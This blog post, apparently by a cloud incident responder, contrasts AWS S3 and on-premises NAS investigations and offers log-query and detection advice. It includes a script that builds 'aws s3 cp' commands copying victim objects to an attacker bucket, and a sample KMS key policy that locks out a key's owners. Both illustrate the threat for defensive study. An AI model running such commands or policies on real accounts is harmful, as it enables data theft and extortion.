Aren't AWS Cloud Investigations the same as On-Prem? - Part 2 (AWS S3)
Introduction
As always, if this is your first time visiting my page, welcome! If you're coming back for more, I do have vouchers to a good clinic I could recommend (just kidding). I'm excited to continue the next post in the mini-series detailing the overlap, but more importantly the differences, in AWS Cloud investigations versus on-premises. In this blog post, we will be diving into AWS S3 this time, which is a beast, so let's skip the rest of the intro.
What is S3?
Airlifted directly from the AWS docs, "Amazon Simple Storage Service (Amazon S3) is an object storage service that offers industry-leading scalability, data availability, security, and performance." AWS S3 is arguably (or not) one of the most popular AWS services ever released and is commonly used to host static website content. It is also used, as the documentation puts it, for object storage. With this in mind, the closest on-premises counterpart would be a NAS (Network Attached Storage). I found it ironic and useful that AWS has documentation dedicated to what a NAS device is, how they work and the different types that exist. However, I want to focus on a few key differences between S3 and a NAS that show up in their architecture, authentication/access, logging and the threats you'll face.
Architecture Difference
Not going to spend too much time here (though I probably should) as there is a fair amount of confusion around whether S3 is a hierarchical file system. The short answer is no, and the longer answer is:
Jokes aside, one key point to take away is that the S3 Console in the AWS portal is misleading: objects are presented to you as if they were truly hierarchical, but this is purely for ease of use and visual consumption. In reality, these objects exist in a flat namespace, literally in a digital bucket. Changing permissions at the bucket level is independent of object-level permissions within the bucket.
Looks like NTFS, but it's not. If you think I am lying to you, try renaming a file or "folder" in S3. You can't, can you? You have to copy the object to a new key (and, for a "folder", copy every object under that prefix) and then remove all the previous versions. If you assumed S3 was the same as a traditional filesystem and were misled by the UI, I will offer my apologies on behalf of AWS, though they never stated it was a filesystem.
*S3 Filesystem Illusion (generated using ChatGPT)*
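The rename illusion is easy to internalize with a toy model. This is a minimal sketch, not real AWS calls: a plain dict stands in for a bucket, and `rename_object` is my own illustrative helper showing that S3's "rename" is really CopyObject followed by DeleteObject.

```python
# A bucket is a flat key/value namespace -- "folders" are just key prefixes.
bucket = {
    "reports/2024/q1.csv": b"q1 data",
    "reports/2024/q2.csv": b"q2 data",
}

def rename_object(bucket, old_key, new_key):
    """There is no rename primitive in S3: it's a copy plus a delete."""
    bucket[new_key] = bucket[old_key]   # CopyObject
    del bucket[old_key]                 # DeleteObject

rename_object(bucket, "reports/2024/q1.csv", "archive/2024/q1.csv")
print(sorted(bucket))  # the "folder" change is just a key-prefix change
```

Note that nothing moved "between folders" here; one flat key was created and another deleted, which is exactly why bucket-level and object-level permissions live independent lives.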
This aside, S3 is one of the most widely used cloud storage services and, to my knowledge, powers a significant share of the public internet, so it is important to know these differences to better prepare yourself for the battle of cloud investigations. Why does knowing file system differences matter to a Cloud Incident Responder/Investigator?
Well, there are many examples I could give, but here is one that may grab your attention. AWS has done a great job of reducing the likelihood, or at least the ease, of creating public S3 buckets, but if you're not enforcing private buckets at the account level, it is still not difficult. As I mentioned above, because the objects live in a flat namespace, any individual object underneath a bucket can be made public regardless of the permissions of the "parent folder" above it or any neighboring objects that appear in the same "folder". It is best not to assume anything based on the bucket permissions or access changes performed at the bucket level.
I will add this and move on (because we have more to talk about 😅): in traditional on-premises environments, you pretty much never have to worry about a threat actor externally enumerating the file system(s) on your NAS devices, presuming the NAS itself is not sitting directly on the internet. Even if your buckets are "private", meaning they are not intentionally public, your bucket names can still be enumerated and discovered by a threat actor abusing the fact that S3 bucket names have to be globally unique. This topic has been covered by other researchers and bloggers, so you can find more on this tactic here.
Authentication & Access
This is another topic that would take longer than our current attention span to do justice, but it is important to note that because AWS IAM is such a complex service, it allows for far more granular control over a file (object) than traditional file systems such as NTFS or Unix file systems. This includes granular controls such as dictating the source IP address from which a given IAM principal is or is not allowed to call actions like DeleteBucket or PutObject. Now, an obvious difference between a shared file system technology such as a NAS and S3 is that a NAS would generally use SMB for file access, typically integrated with Active Directory, or NFS with LDAP-backed identity in an enterprise environment.
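To illustrate that granularity, here is a sketch of a bucket policy statement that denies destructive actions unless the request originates from a corporate IP range. The bucket name and CIDR are placeholders, not a recommendation to copy verbatim:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DenyDeleteOutsideCorpRange",
    "Effect": "Deny",
    "Principal": "*",
    "Action": ["s3:DeleteObject", "s3:DeleteBucket"],
    "Resource": [
      "arn:aws:s3:::example-bucket",
      "arn:aws:s3:::example-bucket/*"
    ],
    "Condition": {
      "NotIpAddress": {"aws:SourceIp": "203.0.113.0/24"}
    }
  }]
}
```

Try expressing "nobody may delete this share except from these IPs" in vanilla NTFS ACLs and you'll see the difference immediately.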
Why do I bring this up? Well, you would generally need to authenticate as a valid user to interact with files hosted on a NAS device. In S3, access to objects is typically authenticated using IAM credentials (IAM user, role)...unless you don't need to "authenticate". As discussed earlier in this series, requests made with compromised credentials are already signed, allowing an attacker to do damage without the traditional "login" process associated with an on-premises domain. Because S3 access occurs over HTTPS, this activity can originate from anywhere in the world. If you have not spent the time to secure your data perimeter, which is not an easy feat for medium to large enterprises, this access can happen unknowingly and right under your nose. This brings me to the next difference, which cuts both ways (for and against you): logging!
Logging
NAS logging will depend on the vendor, but in general it is not as robust as the available logging for S3. S3 logging comes in three different tiers that offer varying levels of visibility. AWS CloudTrail logs S3 management events by default, but this gives you the lowest amount of visibility, as it captures primarily operations that occurred at the bucket level. To put it simply, you'd be forced to tell your lawyers that you must assume the threat actor exfiltrated all the objects in all the buckets they had permissions to list, because you wouldn't be able to prove what they did access. On the other hand, S3 data events would let you know what is happening at the object level and provide the evidence you need to confidently state what your data access exposure was or was not. This gives defenders a tremendous leg up, but it most certainly comes at a cost...
I pray one day this changes (👀looking at any AWS employees reading this blog for some reason) but for now, AWS charges approximately $0.10 per 100,000 data events delivered. This sounds cheap but when you consider the average organization and the scale of API operations across thousands of buckets, you realize this is insanely expensive. Also, from my experience in "hallway chats" with peers across different industries, many do not foot the bill for these logs, which leaves them with many unanswered questions in the thick of an investigation.
There is a tier beyond data events, and it is actually free to enable; you just pay for the storage and any additional plumbing you utilize. S3 server access logging is, in my opinion, better tailored for externally facing buckets, but it would get you most of what you need for an investigation, as it provides useful context similar to HTTP server access style logging. The one caveat is that it is a "best-effort" log source, unlike CloudTrail, which has a service-level agreement. Regardless, if you find yourself needing more than just management events (and pretty much all of us fit into this group), you will at least want to enable data events or server access logs on select buckets.
The HTTP-style logging will likely be familiar to my on-premises brethren (been a while since I've used that word), so the server access logs will be your friend. I stated this in the last blog post, but AWS CloudTrail is by far the cleanest and most consistent cloud logging format across the cloud service providers, in my humble opinion, and it will certainly help your broader investigations when querying this dataset. That probably won't matter to your billing department, but if you need another reason to convince your leadership team why you need S3 data events: consistency of the logging schema, a log delivery SLA and, more importantly, your ability to answer their questions during an incident will go a long way for incident responders and detection engineers.
Threats
The threats that you face aren't necessarily different from on-prem. The one that everyone cares about nowadays is ransomware, so let's use that as the base threat concern. In the NAS world, this would likely come from abusing Active Directory in some way to move laterally and/or finesse your way to an SMB share, then deploying malware to encrypt "all the things" after they've been exfiltrated to the attacker's environment. It is important to understand that this buildup from an initially compromised account to the target account used for ransomware deployment is going to take a lot longer on-premises than in the cloud.
In S3, the "crossover" (referenced in Part 1) effectively accomplishes both. Worded differently, it eliminates the need for both lateral movement and privilege escalation to get access to the S3 buckets you need, depending on the identity that has been compromised. This isn't wildly different from on-premises, but the method(s) of encryption or "ransomware" in S3 can look very different. You'd be shocked how many organizations are not properly protecting access to the keys of their kingdom and are instead leaving them under the doormat. The attacker could simply go after the encryption (KMS) keys that you are using to protect your objects in S3 and change the key policies to grant themselves, or no one at all, the ability to use those keys. There are many options, and this blog does a good job of highlighting a number of them. That said, it would be more likely for the attacker to bring their own encryption keys (similar to on-prem) and encrypt your bucket/objects with an attacker-controlled key.
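To make the key-policy angle concrete, here is a sketch (the account ID and Sid are made up) of what a replaced key policy can look like after such an attack: a single statement granting full control to one attacker-controlled principal. Since KMS key policies are deny-by-default, everyone else, including the victim's own administrators, is effectively locked out of the key:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "OnlyRemainingPrincipal",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
    "Action": "kms:*",
    "Resource": "*"
  }]
}
```

Spotting a kms:PutKeyPolicy event that swaps a policy down to a single foreign principal is the logging equivalent of watching someone change the locks on your own front door.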
If they wanted to exfiltrate files using the S3 service, the commands themselves are very simple and cannot be blocked by the custom-managed network firewalls you brought to the cloud, as S3 transfers those files to an attacker-controlled S3 bucket entirely over the AWS backbone. I want to stress how easy it is to exfiltrate data out of your cloud environment in comparison to an on-premises version of this procedure. Normally, you'd have to download the stolen files to a staging area and maybe compress them into a zip file (not required, but very likely) prior to shipping them to the attacker's C2 server. All of this activity would be apparent in netflow data and certainly firewall logging...if you're looking, that is. In AWS cloud environments, you can simply create a script that utilizes the AWS CLI, similar to what is shown in this Hacking The Cloud post. This would allow you to rip through thousands of objects and accomplish both staging and exfiltration using the native AWS S3 service, which can even encrypt those files at the same time, all while evading the traditional firewall and DLP capabilities that may exist in your non-cloud environment(s).
*On-Prem vs. AWS S3 Exfiltration Flow (generated using ChatGPT)*
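To show how little tooling the S3 path requires, here is a sketch that only *builds* the CLI command strings such a script would issue; nothing here talks to AWS, and both bucket names and object keys are hypothetical:

```python
# Sketch: generate the server-side copy commands an exfil script would issue.
# Nothing here executes against AWS -- it only builds strings for illustration.
victim_bucket = "victim-finance-data"      # hypothetical victim bucket
attacker_bucket = "attacker-staging"       # hypothetical attacker bucket
object_keys = ["payroll/2024.csv", "contracts/msa.pdf", "hr/badge-list.xlsx"]

commands = [
    # `aws s3 cp` between two S3 URIs is a server-side copy: the bytes move
    # bucket-to-bucket over the AWS backbone, never through the caller's network,
    # so your on-prem firewall and DLP stack never see a single packet of it.
    f"aws s3 cp s3://{victim_bucket}/{key} s3://{attacker_bucket}/{key}"
    for key in object_keys
]
for cmd in commands:
    print(cmd)
```

Three lines of loop, and "staging plus exfiltration" collapses into one native S3 operation per object.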
What does this mean for IR?
You will need to move faster in understanding what was done with the compromised credential(s) than on blast-radius-type investigative tasks, at least initially. I find it better to assume the AWS principal can access everything and work backward from there.
Here are my tips/advice to keep in mind during S3 investigations:
- Known compromised AWS access key IDs (permanent and/or temporary) are your friends in AWS CloudTrail log queries. Focus on these keys, filter on userIdentity.accessKeyId, and hone in on your API eventNames of interest. These could include (but are certainly not limited to):
- s3 - CopyObject
- s3 - GetObject
- s3 - PutObject
- s3 - PutBucketEncryptionConfiguration
- s3 - PutBucketPolicy
- kms - CreateKey
- kms - Encrypt
- kms - PutKeyPolicy
- Aggregate on fields requestParameters.bucketName and requestParameters.key to answer data access questions at scale.
- Once you have some idea of what they may have accessed, then worry about what else they could touch. The primary reason is the speed of the cloud, which takes away the luxury of typical on-prem investigative sequencing, such as worrying about blast radius while concurrently looking into what took place.
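The filtering and aggregation steps above can be sketched directly against raw CloudTrail JSON. The field names match CloudTrail's schema, but the records, key IDs and bucket names below are entirely made up:

```python
from collections import Counter

# Hypothetical CloudTrail records, trimmed to just the fields used below.
records = [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLE123"},
     "requestParameters": {"bucketName": "corp-finance", "key": "payroll/2024.csv"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLE123"},
     "requestParameters": {"bucketName": "corp-finance", "key": "contracts/msa.pdf"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject",
     "userIdentity": {"accessKeyId": "AKIAOTHERKEY456"},
     "requestParameters": {"bucketName": "corp-backups", "key": "db.dump"}},
]

COMPROMISED_KEYS = {"ASIAEXAMPLE123"}
EVENTS_OF_INTEREST = {"GetObject", "PutObject", "CopyObject", "PutBucketPolicy"}

# Step 1: filter to the known-bad access key IDs and eventNames of interest.
hits = [r for r in records
        if r["userIdentity"].get("accessKeyId") in COMPROMISED_KEYS
        and r["eventName"] in EVENTS_OF_INTEREST]

# Step 2: aggregate on bucketName/key to answer "what did they touch?" at scale.
touched = Counter((r["requestParameters"]["bucketName"],
                   r["requestParameters"]["key"]) for r in hits)
for (bucket, key), count in touched.items():
    print(f"{bucket}/{key}: {count} event(s)")
```

In practice you'd run the same shape of query in Athena or your SIEM rather than in Python, but the logic (filter on the key, aggregate on bucket/key) is identical.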
Going back to the exfiltration aspect of your investigation, normally you'd go straight to the NetFlow or firewall logs to try to understand C2 and spikes in network volume. That will not help you, or even exist, here; there are no network traffic logs to find (at least not on the customer side; I would be very curious to know if AWS has this information, but they'd never tell anyone). The primary things that will help you here are AWS CloudTrail logs, specifically data events, server access logs and/or management events, whichever you have, in that order.
I do not blame anyone for not having S3 data events because AWS has made these pretty costly (and it would be great if they became a fraction of the current cost), but at the very least you should have S3 server access logs enabled. Regardless, these are the data sources that can tell you everything about the data being yeeted across the AWS backbone at light speed, right into its new home (the attacker's bucket). So do yourself a favor and arm yourself with the evidence to know which door you will need a warrant to knock down.
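If server access logs are all you have, each line is a space-delimited record with a bracketed timestamp and quoted request URI, referrer and user agent. A minimal parser for the fields an investigator cares about most, run against a synthetic log line (the requester ARN, IP and key are invented):

```python
import re

# Synthetic S3 server access log line, following the documented field order.
line = ('79a59df900b949e55d96a1e698fbaced bucket-name '
        '[06/Feb/2019:00:00:38 +0000] 192.0.2.3 '
        'arn:aws:iam::123456789012:user/alice 3E57427F3EXAMPLE '
        'REST.GET.OBJECT payroll/2024.csv '
        '"GET /payroll/2024.csv HTTP/1.1" 200 - 2662992 2662992 70 10 '
        '"-" "aws-cli/2.15.0" -')

# Only the leading fields are captured here; the remainder of the line
# (status, bytes, referrer, user agent, ...) is left unparsed for brevity.
PATTERN = re.compile(
    r'^(?P<owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<ip>\S+) '
    r'(?P<requester>\S+) (?P<request_id>\S+) (?P<operation>\S+) (?P<key>\S+)'
)

record = PATTERN.match(line).groupdict()
print(record["operation"], record["key"], record["ip"])
```

Operation (e.g. REST.GET.OBJECT), key and source IP are usually enough to start answering "what left the building, and to where?" when data events weren't enabled.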
Detection Signals
What detection signals can really help you in your investigations? Sadly, for S3, GuardDuty is probably going to be your only common savior, specifically this finding for anomalous exfiltration behavior. Building quality detections on your own generally requires data events, as the management events alone are not good enough. Even so, this is fairly expensive, not only due to the ingestion and storage of the data but also the computation cost of running detection rulesets against that volume of data.
This is an area where vendors in the CSPM/CNAPP space such as Wiz, Datadog, Sysdig and others can really help you, as this is not an easy problem to solve. Unlike on-premises, where you can write detections based on SMB access and get good fidelity, the fact is that in the cloud these S3 API operations happen at high volume and are expected. This means picking out anomalous GetObject operations becomes a very expensive and, no doubt, high-false-positive battle. CNAPP vendors that can utilize your raw cloud telemetry can help you in ways that are extremely expensive to replicate in-house.
That said, here are some custom detections that can help you detect use-cases of interest:
- S3 Browser Usage
- Logic: Sigma Example 1, Example 2 & Example 3
- Severity: Medium
- Value Prop: S3 Browser may be used in your environment, but realistically it should be controlled and at least used from expected IP ranges. Anything outside of that should be treated as malicious
- S3 Write Events to Unknown Buckets
- Logic: PutObject or CopyObject events destined for S3 buckets that are not in your inventory
- Severity: High
- Value Prop: I presume you want to know about exfiltration to external S3 buckets
- Caveat: You'd need a dynamic list of your managed S3 buckets and your vendors'
- AWS Principal Error Volume
- Logic: Aggregate by AWS Principal (userIdentity.arn) and calculate distinct # of errorCodes and eventSources
- The key is > 3-5 AWS services and > 10 errors
- Severity: Low
- Value Prop: This is low severity but boy does it help when trying to understand if intentional enumeration occurred before the really bad thing happened
- Caveat: You'll need a list of your CSPM/inventory type services that perform enumeration as they are common false positive offenders
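The error-volume detection above can be sketched in a few lines. The events are synthetic and CloudTrail-shaped, the thresholds come from the bullet, and `KNOWN_SCANNERS` is a placeholder for your CSPM/inventory allow-list:

```python
from collections import defaultdict

# Synthetic events shaped as (userIdentity.arn, eventSource, errorCode).
# Principals and counts are invented to exercise the thresholds above.
attacker = "arn:aws:iam::123456789012:user/attacker"
scanner = "arn:aws:iam::123456789012:role/cspm-scanner"
services = ["s3.amazonaws.com", "kms.amazonaws.com",
            "iam.amazonaws.com", "ec2.amazonaws.com"]

events = [(attacker, services[i % 4], "AccessDenied") for i in range(12)]
events += [(scanner, services[i % 4], "AccessDenied") for i in range(40)]
events += [("arn:aws:iam::123456789012:user/dev", "s3.amazonaws.com", "NoSuchKey")]

KNOWN_SCANNERS = {scanner}  # CSPM/inventory roles: common false-positive offenders

# Aggregate per principal: total error count and distinct eventSources touched.
stats = defaultdict(lambda: {"errors": 0, "services": set()})
for principal, source, error in events:
    if error and principal not in KNOWN_SCANNERS:
        stats[principal]["errors"] += 1
        stats[principal]["services"].add(source)

# The key is > 3 AWS services and > 10 errors per principal.
alerts = [p for p, s in stats.items()
          if s["errors"] > 10 and len(s["services"]) > 3]
print(alerts)
```

Only the enumerating principal surfaces: the scanner is allow-listed away and the developer's single NoSuchKey never clears the thresholds, which is exactly the low-severity-but-high-context signal described above.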
Conclusion
You may have picked up that the S3 comparison to an on-prem NAS, and its threats, aren't too different. It's the details that end up mattering the most. Unlike on-prem, you will not get the time you think you'll have to focus on "what can this thing (identity) do?" and will have your hands full with "what did they do?". The details of how a threat actor can use the S3 or KMS services against you will be hard enough for the IR team, assuming you have good enough logging available to query.
In 2026, you will need the help of a modern CNAPP to give your incident response, detection engineering and cloud security teams any realistic shot at securing and investigating their cloud environment. Remember the old phrase: "To be early is to be on time, to be on time is to be late, to be late is to be forgotten". Well, if you think you can wait until the incident happens to turn on S3 data/server access logging, or until after your major incident to grab your purse and pay for a decent CNAPP vendor...your organization will NOT be forgotten...in the headlines. These cloud incidents move too fast, and you sometimes need to make very complex correlations to get the answers enterprise leadership will demand. Trying to do all of that by hand is laughable and impossible without the necessary logging.
Do your Security Ops teams a favor and do the right thing early.


